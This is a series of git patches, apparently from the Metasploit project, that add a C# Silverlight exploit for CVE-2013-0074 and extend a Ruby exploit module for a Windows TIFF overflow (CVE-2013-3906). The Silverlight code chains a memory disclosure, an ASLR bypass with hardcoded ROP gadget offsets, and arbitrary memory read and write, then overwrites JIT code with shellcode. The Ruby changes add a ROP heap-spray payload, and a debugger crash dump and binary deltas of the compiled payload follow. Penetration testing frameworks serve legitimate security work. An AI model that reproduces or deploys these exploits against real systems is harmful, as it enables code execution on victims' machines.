+            for(int i=offs, j=0; i < offs + (is64 ? 8:4); i++, j+=8) u += ((ulong)b[i]) << j;
+            return u;
+        }
+
+        // writes pointer into byte[]
+		public static void WriteAddr(byte[] b, int offs, ulong u)
+        {
+			for (int i = offs; i < offs + (is64 ? 8:4); i++, u >>= 8) 
+                b[i] = (byte)(u & 0xff);      
+        }
+
+		// exploits memory disclosure in BitmapSource.SetSourceInternal()
+        ulong MemoryDiscl()
+        {
+            try
+			{
+				// prepare malicious MemoryStream
+                MyStream ms = new MyStream();
+ 
+				// create image based on stream data and data "outside" the stream
+				BitmapImage bi = new BitmapImage();	
+				ms.offs = 39;		// set offset for 32 bit environment
+				bi.SetSource(ms);	// call the vulnerable SetSourceInternal()
+					
+				// check png data parsing results
+				is64 = bi.PixelWidth == 0 || bi.PixelHeight == 0;
+				if (is64) { // error, ok lets try again with the offset for 64 bit
+					ms.offs = 79; 
+					bi.SetSource(ms);
+				}
+	
+				// check png data parsing results
+				if (bi.PixelWidth == 0 || bi.PixelHeight == 0) throw new Exception("Bad PNG data"); // error png parsing
+
+                // ok, now we should pass the diclosed memory into WriteableBitmap to access it as RGB pixel data
+                WriteableBitmap wb = new WriteableBitmap(bi);
+                LogAdd(wb);
+
+                // read pixels from image
+                int[] p = wb.Pixels;
+                int len = p.Length;
+                LogAdd(String.Format("pixels available to read: {0}", len));
+                string s = " ";
+                for (int i = 0; i < len; i++) {
+                    s = p[i].ToString("X").Substring(2);
+                    LogAdd(String.Format("pixel[{0}] = {1}", i, s));
+                }
+
+                // convert int[] to byte[]
+                byte[] b = new byte[len * 3];
+                int k;
+                for (int i = is64 ? 5:2, j=0; i < len; i++, j+=3)
+                {    
+                    k = p[i] & 0xffffff;
+                    b[j + 2] = (byte)(k & 0xff); k >>= 8;
+                    b[j + 1] = (byte)(k & 0xff); k >>= 8;
+                    b[j + 0] = (byte)(k & 0xff); k >>= 8;
+                }
+
+                // parse memory addresses from b[]
+                ulong hMod  = ReadAddr(b, is64 ?  0:1);		// type pointer for obj[] // we'll need it for mscorlib.ni.dll image base calculation for the ASLR bypass
+				ulong addr1 = ReadAddr(b, is64 ? 24:13);	// obj[0] = address of png[]
+				bufAddr     = ReadAddr(b, is64 ? 32:17);	// obj[1] = address of MainPage.inst.buf[]
+
+				LogAdd("obj[] type = " + Hex(hMod) + ",  png[] address = " + Hex(addr1) + ",  buf[] address = " + Hex(bufAddr));
+
+				// calc the ROP offset inside mscorlib.ni.dll
+		        // * x86
+                // 7997526b 83493440        or      dword ptr [ecx+34h],40h
+                // 7997526f b801000000      mov     eax,1
+                // 79975274 c20400          ret     4
+                // * x64
+                // 000007fe`f03e19d0 895168          mov     dword ptr [rcx+68h],edx
+                // 000007fe`f03e19d3 c3              ret
+				if (Environment.OSVersion.Platform != PlatformID.Win32NT) throw new Exception("Sorry, but the further code works for Windows only.");
+				ulong rop = 0;
+				if (vsn.Major == 5 && vsn.Build == 10411) 
+                {
+					rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A526B);
+				}
+                else if (vsn.Major == 5 && vsn.Build == 61118) 
+                {
+                    rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A520F);
+                } 
+
+				if (rop == 0) throw new Exception("Sorry, but the further code works for vulnerable 5 builds only.");
+
+                // calc object pointer offset inside png2[]
+                ulong addr2 = bufAddr - (ulong)(is64 ? 96:45);
+                k = (int)(addr2 - addr1) - (is64 ? 16:8);
+
+                // write vtable pointer
+                WriteAddr(ms.png, k, addr2);
+				// write address of ROP gadget
+                WriteAddr(ms.png, k + (is64 ? 8:4), rop);
+
+				// ok, return the pointer for ScriptObject.Initialize() exploitation
+                return addr2;
+            }
+            catch (Exception ex)
+            {
+                LogAdd("Error: " + ex.ToString());
+            }
+
+            return 0;
+        }
+
+		class ShellHelper32 : Random
+		{
+			// x32 shellcode
+            uint[] payload;
+
+            // PreCondition : arr.Lenth % 4 == 0
+            public virtual void SetPayload(byte[] arr)
+            {
+                payload = new uint[arr.Length / 4];
+                for (int i = 0, k = 0; i < arr.Length; i += 4, k += 1)
+                {
+                    payload[k] = BitConverter.ToUInt32(arr, i);
+                }
+            }
+			
+			// read uint from memory address
+			uint Get(uint addr)
+			{
+				if (addr > 0x10000) return buf[(addr - (uint)bufAddr - 8) >> 2]; else return 0;
+			}
+
+			// write uint into memory address
+			void Set(uint addr, uint val)
+			{
+				if (addr > 0x10000) buf[(addr - (uint)bufAddr - 8) >> 2] = val;
+			}
+
+			// exchange two uint arrays
+			void Exchange(uint addr, uint[] arr)
+			{
+				uint u; 
+				int len = arr.Length;
+				for (int i=0; i < len; i++, addr += 4) {
+					u = Get(addr); Set(addr, arr[i]); arr[i] = u;
+				}
+			}
+
+			// declare virtual function for the further DEP bypass
+			public virtual int Payload()
+			{
+				// generate dummy JIT-code
+				if (this == null) LogAdd(ToString());
+				if (this == null) LogAdd(ToString());
+				if (this == null) LogAdd(ToString());
+				if (this == null) LogAdd(ToString());
+				if (this == null) LogAdd(ToString());
+                LogAdd("Payload() hit!");
+				return 0;
+			}
+
+			public virtual void Exec(int oldLen)
+			{
+				try {
+					// generate JIT-code for Payload()
+					Payload();
+
+					// save pointers within obj[] array after buf[]	
+					obj[0] = buf;
+					obj[1] = this;			
+	
+					// find obj[] array and "this" pointer after buf[] 
+					uint addr = 0;
+					for (int i = 2; i < 64; i++)
+						if (buf[i] == (uint)bufAddr) { addr = buf[i+1]; break; }
+
+					if (addr == 0) throw new Exception("Can't find obj[]");
+
+					// get (this.type + 2c) -> (vtable + 8) -> Payload() address
+					addr = Get(Get(Get(addr) + 0x2c) + 8);
+					//for (uint i = 0; i < 16; i++) LogAdd(Hex(Get(addr + i*4))); // for RnD
+					LogAdd("Payload() address = " + Hex(addr));
+					if (addr == 0) throw new Exception("Can't find Payload() address");
+
+					// copy payload over JIT-code memory
+					addr -= addr % 4;
+					Exchange(addr, payload);
+
+                    uint contents = Get(addr);
+
+                    LogAdd("Payload() Address " + Hex(addr) + ", Contents: " + Hex(contents));
+
+                    LogAdd("Executing payload...");
+					// exec payload
+					int res = Payload();
+
+					// restore JIT memory
+					//Exchange(addr, payload);
+
+					LogAdd("Payload() returns " + Hex(res));
+				}
+				catch (Exception ex) {
+					LogAdd("Error: " + ex.ToString());
+				}
+
+				// restore buf[] length
+				buf[0x40000000-1] = (uint)oldLen;
+				LogAdd("buf.Length = " + Hex(buf.Length));
+			}
+		}
+
+		class ShellHelper64 : ShellHelper32
+		{
+			// x64 shellcode
+			byte[] payload;
+
+            public override void SetPayload(byte[] arr)
+            {
+                payload = new byte[arr.Length];
+                for (int i = 0; i < arr.Length; i += 1)
+                {
+                    payload[i] = arr[i];
+                }
+            }
+		 
+			UnmanagedMemoryStream ums;
+			ulong umsAddr;
+			byte[] bb;
+
+			// read ulong from x64 memory address
+			ulong Get(ulong addr)
+			{
+				if (addr < 0x10000) return 0;
+
+				addr = (addr - bufAddr - 8) >> 2;
+				return ((ulong)buf[addr+1] << 32) + buf[addr];
+			}
+
+			// write ulong into x64 memory address
+			void Set(ulong addr, ulong val)
+			{
+				if (addr < 0x10000) return;
+
+				addr = (addr - bufAddr - 8) >> 2;
+				buf[addr] = (uint)val;
+				buf[addr+1] = (uint)(val >> 32);		
+			}
+
+			// read ulong from x64 memory address using ums
+			ulong Read(ulong addr)
+			{
+				if (addr < 0x10000) return 0;
+
+				// set ums._mem pointer
+				Set(umsAddr + 8, addr);
+
+				// read ulong from ums
+				ums.Position = 0;
+				ums.Read(bb, 0, 8);
+				return ReadAddr(bb, 0);
+			}
+
+			// write ulong into x64 memory address using ums
+			void Write(ulong addr, ulong val)
+			{
+				if (addr < 0x10000) return;
+
+				// set ums._mem pointer
+				Set(umsAddr + 8, addr);
+
+				// write ulong into ums
+				ums.Position = 0;
+				WriteAddr(bb, 0, val);
+				ums.Write(bb, 0, 8);
+			}
+
+			// exchange two byte[] arrays
+			void Exchange(ulong addr, byte[] arr)
+			{
+				int len = arr.Length;
+				byte[] b = (byte[])arr.Clone();
+				
+				// set ums._mem pointer
+				Set(umsAddr + 8, addr);
+
+				// read byte[] from ums
+				ums.Position = 0;
+				ums.Read(arr, 0, len);
+
+				// write byte[] into ums
+				ums.Position = 0;
+				ums.Write(b, 0, len);
+			}
+
+			public override void Exec(int oldLen)
+			{
+				try {
+					// generate JIT-code for Payload()
+					Payload();
+
+					// create UnmanagedMemoryStream
+					ResourceManager rm = new ResourceManager("System.Windows.g", typeof(Control).Assembly);
+					ums = rm.GetStream("themes/generic.xaml");
+					LogAdd(ums);
+					if (ums == null) throw new Exception("Can't find themes/generic.xaml");
+
+					// save pointers within obj[] array after buf[]		
+					obj[0] = buf;
+					obj[1] = this;
+					obj[2] = ums;
+
+					// find obj[] array after buf[] 
+					ulong addr = 0; 
+					for (int i = 3; i < 64; i++)
+						if (buf[i] == (uint)bufAddr) {
+							addr = ((ulong)buf[i+3] << 32) + buf[i+2];				
+							umsAddr = ((ulong)buf[i+5] << 32) + buf[i+4]; 
+
+							// ensure that ums was allocated after buf[]
+							for (int j = 0; j < 100 && bufAddr > umsAddr; j++) {
+								ums = rm.GetStream("themes/generic.xaml");
+								obj[2] = ums;
+								umsAddr = ((ulong)buf[i+5] << 32) + buf[i+4]; 
+							}
+
+							break; 
+						}
+
+					if (addr == 0) throw new Exception("Can't find obj[]");
+					LogAdd("ums address = " + Hex(umsAddr));
+					if (bufAddr > umsAddr) throw new Exception("Can't allocate ums after buf[]");
+
+					//for (uint i = 0; i < 10; i++) LogAdd(Hex(Get(umsAddr+i*8))); // for RnD
+
+					// set ums._access private field to FileAccess.ReadWrite = 3
+					Set(umsAddr + 6*8, 0x300000003);
+					LogAdd("ums.Length = " + ums.Length + ", CanRead = " + ums.CanRead + ", CanWrite = " + ums.CanWrite + ", CanSeek = " + ums.CanSeek);
+					if (!ums.CanRead || !ums.CanWrite) throw new Exception("Can't access ums");
+
+					// ok, we have UnmanagedMemoryStream with controlable private fields, 
+					// so we can set any custom ums._mem pointer and read/write data starting from this pointer
+
+					// get (this.type + 72) -> (vtable + 16) -> Payload() address
+					bb = new byte[8];
+					addr = Read(Read(Read(addr) + 9*8) + 16);
+					//for (uint i = 0; i < 16; i++) LogAdd(Hex(Read(addr + i*8))); // for RnD
+					LogAdd("Payload() address = " + Hex(addr));
+					if (addr == 0) throw new Exception("Can't find Payload() address");
+
+					// copy payload over JIT-code memory
+					Exchange(addr, payload);
+
+					// exec payload
+					int res = Payload();
+
+					// restore JIT memory
+					//Exchange(addr, payload);
+
+					LogAdd("Payload() returns " + Hex(res));			
+				}
+				catch (Exception ex) {
+					LogAdd("Error: " + ex.ToString());
+				}
+
+				// restore buf[] length
+				if (bb != null) {
+					Write(bufAddr + 8, (ulong)oldLen);
+					LogAdd("buf.Length = " + Hex(buf.Length));
+				}
+			}
+		}
+
+        void exploit()
+        {
+            try
+            {
+                LogAdd("------------ START ------------");
+                // prepare pointer for ScriptObject.Initialize()
+                ulong h = MemoryDiscl();
+                LogAdd("handle = " + Hex(h));
+                if (h == 0) throw new Exception("Something is wrong with the memory disclosure");
+
+                // save old length
+                int oldLen = buf.Length;
+                LogAdd("buf.Length = " + Hex(oldLen));
+
+                // call ScriptObject.Initialize() and cause the buf.Length corruption 
+                MyObject mo = new MyObject();
+                mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h)
+
+                // check results
+                int len = buf.Length;
+                LogAdd("buf.Length = " + Hex(len));
+                if (len == oldLen) throw new Exception("Something is wrong with buf.Length");
+
+                // ok, now we have an uint[] array with Length > 0x40000000, so we can read/write arbitrary memory addresses on x32,
+                // but this is not allways enough for x64. So for 64-bit we have to use different technique to gain the true "god mode".
+                ShellHelper32 sh;
+                if (is64)
+                {
+                    sh = new ShellHelper64();
+                    sh.SetPayload(payload);
+                }
+                else
+                {
+                    sh = new ShellHelper32();
+                    sh.SetPayload(payload);
+                }
+
+                // execute payload
+                sh.Exec(oldLen);
+
+                LogAdd("------------  END  ------------");
+            }
+            catch (Exception ex)
+            {
+                LogAdd("Error: " + ex.ToString());
+            }
+        }
+
+
+		void btnClickMe_Click(object sender, RoutedEventArgs e)
+        {
+#if DEBUG
+            exploit();
+#endif
+        }
+	}
+
+}
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/Properties/AppManifest.xml b/external/source/exploits/cve-2013-0074/SilverApp1/Properties/AppManifest.xml
new file mode 100755
index 0000000000..a955232752
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/Properties/AppManifest.xml
@@ -0,0 +1,6 @@
+<Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment"
+        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
+>
+    <Deployment.Parts>
+    </Deployment.Parts>
+</Deployment>
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/Properties/AssemblyInfo.cs b/external/source/exploits/cve-2013-0074/SilverApp1/Properties/AssemblyInfo.cs
new file mode 100755
index 0000000000..01d6c01187
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/Properties/AssemblyInfo.cs
@@ -0,0 +1,35 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following 
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("SilverApp1")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("Microsoft")]
+[assembly: AssemblyProduct("SilverApp1")]
+[assembly: AssemblyCopyright("Copyright © Microsoft 2011")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible 
+// to COM components.  If you need to access a type in this assembly from 
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("2b886857-ef39-4df1-9815-19a050632476")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version 
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Revision and Build Numbers 
+// by using the '*' as shown below:
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/SilverApp1.csproj b/external/source/exploits/cve-2013-0074/SilverApp1/SilverApp1.csproj
new file mode 100755
index 0000000000..8ccc470645
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/SilverApp1.csproj
@@ -0,0 +1,107 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProductVersion>8.0.50727</ProductVersion>
+    <SchemaVersion>2.0</SchemaVersion>
+    <ProjectGuid>{D33B3660-E6CA-4B29-9E09-0DF99B28840E}</ProjectGuid>
+    <ProjectTypeGuids>{A1591282-1198-4647-A2B1-27E5FF5F6F3B};{fae04ec0-301f-11d3-bf4b-00c04f79efbc}</ProjectTypeGuids>
+    <OutputType>Library</OutputType>
+    <AppDesignerFolder>Properties</AppDesignerFolder>
+    <RootNamespace>SilverApp1</RootNamespace>
+    <AssemblyName>SilverApp1</AssemblyName>
+    <TargetFrameworkIdentifier>Silverlight</TargetFrameworkIdentifier>
+    <TargetFrameworkVersion>v5.0</TargetFrameworkVersion>
+    <SilverlightVersion>$(TargetFrameworkVersion)</SilverlightVersion>
+    <SilverlightApplication>true</SilverlightApplication>
+    <SupportedCultures>
+    </SupportedCultures>
+    <XapOutputs>true</XapOutputs>
+    <GenerateSilverlightManifest>true</GenerateSilverlightManifest>
+    <XapFilename>SilverApp1.xap</XapFilename>
+    <SilverlightManifestTemplate>Properties\AppManifest.xml</SilverlightManifestTemplate>
+    <SilverlightAppEntry>SilverApp1.App</SilverlightAppEntry>
+    <TestPageFileName>SilverApp1TestPage.html</TestPageFileName>
+    <CreateTestPage>true</CreateTestPage>
+    <ValidateXaml>true</ValidateXaml>
+    <EnableOutOfBrowser>false</EnableOutOfBrowser>
+    <OutOfBrowserSettingsFile>Properties\OutOfBrowserSettings.xml</OutOfBrowserSettingsFile>
+    <UsePlatformExtensions>false</UsePlatformExtensions>
+    <ThrowErrorsInValidation>true</ThrowErrorsInValidation>
+    <LinkedServerProject>
+    </LinkedServerProject>
+    <TargetFrameworkProfile />
+  </PropertyGroup>
+  <!-- This property group is only here to support building this project using the 
+       MSBuild 3.5 toolset. In order to work correctly with this older toolset, it needs 
+       to set the TargetFrameworkVersion to v3.5 -->
+  <PropertyGroup Condition="'$(MSBuildToolsVersion)' == '3.5'">
+    <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>Bin\Debug</OutputPath>
+    <DefineConstants>DEBUG;TRACE;SILVERLIGHT</DefineConstants>
+    <NoStdLib>true</NoStdLib>
+    <NoConfig>true</NoConfig>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>Bin\Release</OutputPath>
+    <DefineConstants>TRACE;SILVERLIGHT</DefineConstants>
+    <NoStdLib>true</NoStdLib>
+    <NoConfig>true</NoConfig>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="mscorlib" />
+    <Reference Include="System.Windows" />
+    <Reference Include="system" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Windows.Browser" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="App.xaml.cs">
+      <DependentUpon>App.xaml</DependentUpon>
+    </Compile>
+    <Compile Include="MainPage.xaml.cs">
+      <DependentUpon>MainPage.xaml</DependentUpon>
+    </Compile>
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <ApplicationDefinition Include="App.xaml">
+      <SubType>Designer</SubType>
+      <Generator>MSBuild:Compile</Generator>
+    </ApplicationDefinition>
+    <Page Include="MainPage.xaml">
+      <SubType>Designer</SubType>
+      <Generator>MSBuild:Compile</Generator>
+    </Page>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="Properties\AppManifest.xml" />
+  </ItemGroup>
+  <Import Project="$(MSBuildExtensionsPath32)\Microsoft\Silverlight\$(SilverlightVersion)\Microsoft.Silverlight.CSharp.targets" />
+  <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
+       Other similar extension points exist, see Microsoft.Common.targets.
+  <Target Name="BeforeBuild">
+  </Target>
+  <Target Name="AfterBuild">
+  </Target>
+  -->
+  <ProjectExtensions>
+    <VisualStudio>
+      <FlavorProperties GUID="{A1591282-1198-4647-A2B1-27E5FF5F6F3B}">
+        <SilverlightProjectProperties />
+      </FlavorProperties>
+    </VisualStudio>
+  </ProjectExtensions>
+</Project>
\ No newline at end of file

From c8fd761c53b9ddb3875a267264cf15cc27240d2c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 22 Nov 2013 16:57:29 -0600
Subject: [PATCH 070/217] Progress

---
 .../windows/fileformat/mswin_tiff_overflow.rb | 69 +++++++++++++++++--
 1 file changed, 62 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 590bc1f443..fe317c739f 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::RopDb
 
   def initialize(info={})
     super(update_info(info,
@@ -132,6 +133,30 @@ class Metasploit3 < Msf::Exploit::Remote
       buf = f.read
     end
 
+    # Gain control of the call [eax+50h] instruction
+    buf[0x4874, 4] = [0x41424344-0x50].pack('V')
+
+    buf
+  end
+
+
+  #
+  # Generates a payload
+  #
+  def get_rop_payload
+    # Target address (200F0700):
+    # 0:000> dd  200f06fc L4
+    # 200f06fc  ffffffff 36643ab8 d9c0d946 5af42474
+    p      = generate_rop_payload('msvcrt','',{'target'=>'xp'})
+    p     << payload.encoded
+    block  = p
+    block << "B" * (1024 - p.length)
+
+    buf = ''
+    while (buf.length < 0x80000)
+      buf << block
+    end
+
     buf
   end
 
@@ -203,9 +228,7 @@ class Metasploit3 < Msf::Exploit::Remote
     mscd << [0x00000003].pack('V')
     mscd << [0xfffffffe].pack('V')
     mscd << [0xffffffff].pack('V') * 52
-
-    mscd << "W00TW00T"
-    mscd << "A" * 1024
+    mscd << @rop_payload
 
     mscd
   end
@@ -670,7 +693,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def init_activex_files(last_rid)
     activex = []
 
-    1.times do |i|
+    0x250.times do |i|
       id = (last_rid += 1)
 
       bin  = {
@@ -799,18 +822,19 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
+    print_status("Packing ActiveX controls...")
     activex.each do |ax|
       ax_bin  = ax[:bin]
       ax_xml  = ax[:xml]
       ax_rels = ax[:rels]
 
-      print_status("Packing file: #{ax_bin[:fname]}")
+      vprint_status("Packing file: #{ax_bin[:fname]}")
       zip.add_file(ax_bin[:fname], ax_bin[:bin])
 
-      print_status("Packing file: #{ax_xml[:fname]}")
+      vprint_status("Packing file: #{ax_xml[:fname]}")
       zip.add_file(ax_xml[:fname], ax_xml[:xml])
 
-      print_status("Packing file: #{ax_rels[:fname]}")
+      vprint_status("Packing file: #{ax_rels[:fname]}")
       zip.add_file(ax_rels[:fname], ax_rels[:rels])
     end
 
@@ -833,6 +857,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+    @rop_payload = get_rop_payload
     @schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
     path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906")
     docx = make_docx(path)
@@ -843,6 +868,36 @@ end
 
 =begin
 
+0:000> r
+eax=414242f4 ebx=00000000 ecx=22a962a0 edx=44191398 esi=22c4d338 edi=1cfe5dc0
+eip=44023a2a esp=0011fd8c ebp=0011fd98 iopl=0         nv up ei ng nz na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
+OGL!GdipCreatePath+0x58:
+44023a2a ff5050          call    dword ptr [eax+50h]  ds:0023:41424344=????????
+0:000> k
+ChildEBP RetAddr  
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0011fd98 437a9681 OGL!GdipCreatePath+0x58
+0011fdc8 437b11b0 gfx+0x9681
+0011fdf0 422b56e5 gfx+0x111b0
+0011fe18 422a99f7 oart!Ordinal3584+0x86
+0011fed8 422a9921 oart!Ordinal7649+0x2b2
+0011fef0 422a8676 oart!Ordinal7649+0x1dc
+001200bc 422a85a8 oart!Ordinal4145+0x199
+001200fc 424898c6 oart!Ordinal4145+0xcb
+001201bc 42489b56 oart!Ordinal3146+0xb15
+001202cc 422a37df oart!Ordinal3146+0xda5
+00120330 422a2a73 oart!Ordinal2862+0x14e
+00120360 317821a9 oart!Ordinal2458+0x5e
+001203bc 31782110 wwlib!GetAllocCounters+0x9bd51
+001204a4 3177d1f2 wwlib!GetAllocCounters+0x9bcb8
+001207ec 3177caef wwlib!GetAllocCounters+0x96d9a
+0012088c 3177c7a0 wwlib!GetAllocCounters+0x96697
+001209b0 3175ab83 wwlib!GetAllocCounters+0x96348
+001209d4 317569e0 wwlib!GetAllocCounters+0x7472b
+00120ad4 317540f5 wwlib!GetAllocCounters+0x70588
+00120afc 3175400b wwlib!GetAllocCounters+0x6dc9d
+
   To-do:
   Turn the docx packaging into a mixin. Good luck with that. 
   

From 25eb13cb3c975964547a1e160f2fa70efb7cf9ee Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 22 Nov 2013 17:02:08 -0600
Subject: [PATCH 071/217] Small fix to interface

---
 data/exploits/cve-2013-0074/SilverApp1.dll    | Bin 17408 -> 17408 bytes
 data/exploits/cve-2013-0074/SilverApp1.xap    | Bin 8380 -> 8381 bytes
 .../cve-2013-0074/SilverApp1/MainPage.xaml    |   2 +-
 3 files changed, 1 insertion(+), 1 deletion(-)

diff --git a/data/exploits/cve-2013-0074/SilverApp1.dll b/data/exploits/cve-2013-0074/SilverApp1.dll
index 84211975c9cfdd68a240de14ad31f602f5f1e07c..87ea67ba4b63548133fe0b61f37aff84759c0147 100755
GIT binary patch
delta 256
zcmZqZU~K4MoY29v=;6e!GQNx`28Lh;AV>fr=81~JJPiyCJV5@HNCpO($ro*OCPy-E
zXXKeI$Rx~knGGnQwK;(4g#hFE&6dJyOpGfwCy0hKG3)8+Z9X6##I#vNYJ!l8qq&Q@
ztAVkRuA8&Dv#yDYp_8top^2fci@BSlnYo#ziHW20<`X&|+yX`qt}n0oBkjA;@%pdy
zOqVsA6)X-g>n?iO9|Uv)0}~Ke0PzQ)TRvDbFa!m=1hegtOima7>9X@=NN}>nZbrt*
oyf%u`$z`d!Mh1q)x&{X3CNU_y$sRW9j1wjo+8A!0Ws}AZ0MqzN)Bpeg

delta 264
zcmZqZU~K4MoY27}b8li-8DBvZ1A{jM5F`K*^F&2qo(2X69w7ftBm;xY<cl^slOq|o
zGm1<WWD;h&$p#eA+8n_2LV)q=W=ml;CdPG}6GX$AI2Do;bCUH^D^fS_5)WcxWZ29t
zHBm^#(#_Do$k@?E*Tl`mN!P^D)lApYz{FYC%+=h$$j!;g&D_#p^8p<XZh^JR0`qVC
zKl7U4lUJa>`}>5=5*7!Tb!G1L2LYYJzy!qQK>P#frXSV}3_-yz!AjdQf3{}lxzA%V
zl$q?Bki$Be)kaY&w>V9=I5Vd#wJ0YuJ)<Nh7|eDoC@`GtXrs==Fk^D2jp61+HgW6#
Dz}in4

diff --git a/data/exploits/cve-2013-0074/SilverApp1.xap b/data/exploits/cve-2013-0074/SilverApp1.xap
index 10bf6281a103b18da25ef299c19f3a7ee0db2d45..77907f982fa6941e772933931569d5a3a8c1cda3 100755
GIT binary patch
delta 8079
zcmV;AA8_EjLA^l?P)h>@6aWAS2mn>Tkqq<+Rljya2fT+B3zG=}9e*6>b>E%Y-Psoa
zaslE+ycVD+E(u`qBtTLmMLhU`M34{xil9UpT<i{j1$TE=vkM9!Lz=2%yS5_9tgX0K
zZN;M9#EKi)O03qZ6~<CiIj$ntvUH9dJ5i+*ySC$6s*?D`R$ZyTduR562PNC}A3dj8
zVD5bPe)sj=?|!eD-G9;BK0*#6a^iaXZK5xe_1Q=7{<(y!tm!|N(U-i>HGf$-{9N<I
zTs#v@o5rjeNd}{lRLaN(r}dz@kP60A!QrFh!K4w>!=<IZ>ueok`-u)K4!ZK{{l{{8
zUm>;GulR{}1JNwn)!P7qxK7*NaapzeCMw+N(-xgS4%+vAqJQ=BU%2OQ@|lC)akBKD
zcC6jV65L)qNmNh2!Uz6&ick;mLq&Kvt1o78|MOjTyLK1+E>dwiY-Y?T*}k2&8@hKn
zAEL1@Z0ZRkYWXT1!@34n@eQtY^V7Fk_d_D$qLLj%f6+{&*!4TQh+fcs`DQyhoit>Z
z)lh)Qr>bvhaDPV2lmiJ>*c1m-HZY~qrZ|~W#guBMgkV(Lc9ZHfYJg@+frV;O+NN!5
zR6`rNbd!1>bx!p>=+2Of`Kbc-Zzl0Su)&wv0;1pTyuci8^#Zep>LA<R?iQ(Pqn<4`
z02qw`T6?McEiJ^ZGy(N#20Foa{WhwD-V;_>0}i8^`F~pg?BXU?a-9e?wKQ!pHlt|5
zg|z7gFs|pC&=w}59cj({AYdrOl3Q8*%Z}?`rfsCyi8($_j&?NR!|HkHaJDJi)anad
zQqB7zSd(dGb8Q@gZuKG$f>4+dZu>dOdkP5ozIc$4$%_s_CVi^I=?ZnQ$;Nx(l;U?+
zna@Gx6@PcN<G%RsYzOIzyT<&9kZPSaVWasELa1}ugnILzgwUYbgit4YREDsj3(yBH
z`asSP%d}6eu?=2uazn%~ZBjjtUUr_mw+~ep(1Fg{d;3wm<dGr^T=JnPN~+ZJF6nKT
zXw*(>p)O98^Ugx$6$`7r=n;fl>yfme4~-o;Sbyr<2yIk4a%h<68Xlfb509(guDI`M
zc6aRX#Qx>!+%YmdFtPX@<vRK<CP#%eYHsp)eg2ZtvURjRP+qa2vZ|VDYB$!^H#9a?
z*DG&axcapjmL1uDWcbm+)BoaX(^hHV=5KD~uIh%<m$-MDZnnvFc`~<?)4PYe^Qx&R
zlz(=FdO5ZjNt)TC*l8o7RvpzLgx^<P73yPt8G8%)vDeRhJ6J2`1gCidvKP5z?BqPm
zu&Q00fsBT3$SHN0??sKVoAEs?T*|`tvv8@zU3xsUH}3?GUmI@Yzkj7RdAq93uR&rR
zna{DA8*`&$+d2yE<NNP|X})hc*FZ7XV1F*3JFF=$P&My!_^V1<H)yK+a>~<m<J9z|
